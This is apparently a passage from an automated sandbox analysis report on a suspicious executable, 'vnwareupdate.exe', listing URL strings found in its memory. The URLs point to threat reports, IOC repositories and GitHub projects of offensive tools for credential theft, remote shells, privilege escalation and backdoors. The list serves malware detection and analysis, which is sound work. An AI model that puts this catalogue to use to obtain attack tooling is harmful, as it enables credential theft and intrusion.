Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXe3Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXe6Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXf1Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXf6Campaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXfcCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXmyCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXneCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXpdfCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXpeCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXroCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXteCampaign
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXtoCampaign
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/Appendix-DressCode-Android-Malware-Finds
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/Appendix-DressCode-Android-Malware-Finds.
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/Appendix-DressCode-Android-Malware-FindsChinese
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/Appendix-DressCode-Android-Malware-FindsDressCode
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/appendix-CVE-2017-11882-exploited-to-del
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/appendix-CVE-2017-11882-exploited-to-delCVE-2017-11882
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/appendix-CVE-2017-11882-exploited-to-delStrongPity2
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/appendix-untangling-the-patchwork-cybere
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/appendix-untangling-the-patchwork-cybere8fb36bf4d5cf98c2;APT
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/appendix-untangling-the-patchwork-cybereAPT3
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/appendix-untangling-the-patchwork-cybereCVE-2017-10271
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/appendix-untangling-the-patchwork-cybereNew
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/appendix-untangling-the-patchwork-cybereUntangling
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/appendix-untangling-the-patchwork-cyberefb28dee5fde7cbb0;APT
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphin
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinCyberespionage
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinNew
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinTravle
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://exchange.xforce.ibmcloud.com/collection/Group-123s-2016-to-2018-Campaign
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://exchange.xforce.ibmcloud.com/collection/Group-123s-2016-to-2018-Campaign/Skygofree:
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://exchange.xforce.ibmcloud.com/collection/Group-123s-2016-to-2018-Campaign0Comnie
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://f5.com/labs/articles/threat-intelligence/malware/marcher-gets-close-to-u
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://f5.com/labs/articles/threat-intelligence/malware/marcher-gets-close-to-u8
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://f5.com/labs/articles/threat-intelligence/malware/marcher-gets-close-to-uMARCHER
Source: vnwareupdate.exe, 00000003.00000003.245916145.0000000003967000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto8
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: https://file.gdatasoftware.com/web/en/documents/whitepaper/Rurktar.pdf
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://file.gdatasoftware.com/web/en/documents/whitepaper/Rurktar.pdfAPT29
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://file.gdatasoftware.com/web/en/documents/whitepaper/Rurktar.pdfRurktar
Source: vnwareupdate.exe, 00000003.00000003.234268201.0000000006033000.00000004.00000001.sdmp	String found in binary or memory: https://firstlook.org/theintercept/2015/08/21/inside-the-spyware-campaign-agains
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://ghostbin.com/paste/jsph7
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://ghostbin.com/paste/xgvdv
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://gist.github.com/edeca/01f5e35d7de074cdd6710caddd973965
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://gist.github.com/edeca/01f5e35d7de074cdd6710caddd973965Paranoid
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://gist.github.com/edeca/01f5e35d7de074cdd6710caddd973965The
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://gist.github.com/subTee/c98f7d005683e616560bda3286b6a0d8#file-katz-xml
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/0x00-0x00/ShellPop
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/0xbadjuju/Sharpire_RID2A4F
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/AlessandroZ/BeRoot/tree/master/Windows
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/AlessandroZ/LaZagne
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/AlessandroZ/LaZagne/releases/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/BeetleChunks/redsails
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Ben0xA/nps
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Cn33liz/SharpCat_RID2A27
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Cn33liz/p0wnedShell
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/CoreSecurity/impacket
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/DarthTon/Blackbone
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/FuzzySecurity/PowerShell-Suite
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/HarmJ0y/KeeThief
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Kevin-Robertson/Invoke-TheHash
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/MalwareTech/UACElevator_RID2B2C
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Neo23x0/Loki/issues/35
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Neo23x0/yarGen
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/PowerShellEmpire/Empire
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Torte_ELF.yarLinux
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Torte_ELF.yarRurktar
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/adaptivethreat/Empire
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bartblaze/PHP-backdoors
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bitsadmin/nopowershell
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/citizenlab/malware-signatures/blob/master/packrat/domains.csv
Source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/citizenlab/malware-signatures/blob/master/packrat/domains.csvPackrat:
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/citizenlab/malware-signatures/blob/master/packrat/domains.csvRovnix
Source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/citizenlab/malware-signatures/blob/master/packrat/domains.csvSouth
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/cpaton/Scripting/blob/master/VBA/Base64.bas
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/cuckoosandbox/monitor/blob/master/bin/inject.c
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/eset/malware-ioc/blob/master/sednit/part3.adoc
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/eset/malware-ioc/blob/master/sednit/part3.adocA
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/fireeye/iocs/tree/master/APT28
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/foxglovesec/RottenPotato
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/frohoff/ysoserial
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/g0tmi1k/exe2hex
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/gdssecurity/PSAttack/releases/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/gentilkiwi/kekeo/releases
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/gentilkiwi/mimikatz/releases
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/hfiref0x/UACME
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/huntergregal/mimipenguin
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/jaredhaight/Invoke-MetasploitPayload/blob/master/Invoke-MetasploitPayload.ps1
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/joridos/custom-ssh-backdoor05ce6e55dc8b2cdf07eca710c652032dae7940d9f719d24c65de77
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/maaaaz/impacket-examples-windows
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/mdsecactivebreach/CACTUSTORCH_RID2A54
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/n1nj4sec/pupy-binaries
Source: vnwareupdate.exe, 00000003.00000003.241963093.0000000005611000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%2
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/nccgroup/Winpayloads
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/nccgroup/redsnarf
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/nikicat/web-malware-collection
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/odzhan/shells/
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/pan-unit42/iocs/blob/master/ramdo/hashes.txt
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/peewpw/Invoke-PSImage
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/ptrrkssn/pnscan
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/putterpanda/mimikittenz
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/rsmudge/metasploit-loader
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/samratashok/nishang
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/skelsec/PyKerberoast
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/sqlmapproject/sqlmap
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/stamparm/EternalRocks
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/stamparm/EternalRocksBronze
Source: vnwareupdate.exe, 00000003.00000003.237440903.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/stamparm/EternalRocksEDB660EF32E2FD59AD1E610E9842C2DF;Dridex
Source: vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/stamparm/EternalRocksEternalRocks
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/stamparm/EternalRocksProject
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/stamparm/EternalRocksTofsee
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/subTee/AllTheThings_RID2BB8
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/t3ntman/CrunchRAT_RID2A5B
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/tiagorlampert/CHAOS
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/valsov/BackNet
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/vysec/ps1-toolkit
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/wordfence/grizzly
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/xmrig/xmrig/releases
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/zerosum0x0/koadic
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://go.recordedfuture.com/hubfs/reports/cta-2018-0116-appendix.pdf
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://go.recordedfuture.com/hubfs/reports/cta-2018-0116-appendix.pdf-2017-9805
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://go.recordedfuture.com/hubfs/reports/fr-2018-0214.pdf
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://go.recordedfuture.com/hubfs/reports/fr-2018-0214.pdfDDG:
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://go.recordedfuture.com/hubfs/reports/fr-2018-0214.pdfTargeting
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://go.recordedfuture.com/hubfs/reports/fr-2018-0214.pdfurce:
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/4if3HG
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/4nyX1e
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/4nyX1eAPT29
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/4nyX1eAPTnotes
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/4pTkGQ
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/5jvv9q
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/7jGkpV
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/7yKyOj
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/7yKyOjq
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/8LbqZ9
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/8LbqZ9Bronze
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/8LbqZ9IB
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/8U6fY2
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/8U6fY23e91f399d207178a5aa6de3d680b58fc3f239004e541a8bff2cc3e851b76e8bb0914f9fbdac67cd
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/9DNn8q
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/AW9Cuu
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/BSQWzw
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/BvYurS
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/CX3KaY
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/CpfJQQ
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/CywXnS
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/CywXnS3f23d152cc7badf728dfd60f6baa5c861a500630nS10586913ceeecd408da4e656c29ed4e91c6b7
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/E4qia9
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/HG2j5T
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/HZ5XMN
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/JAHZVL
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/JAlw3s
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/JQVfFP
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/L9g9eR
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/L9g9eR0
Source: vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/L9g9eRIRC
Source: vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/L9g9eRMiddle
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/L9g9eRP
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/L9g9eRp
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/LXeeW70face841f7b2953e7c29c064d6886523W7APT28
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/LXeeW77e68371ba3a988ff88e0fb54e2507f0d0529b1d393f405bc2b2b33709dd571539fea62c042a8eda
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/LXeeW7APT28
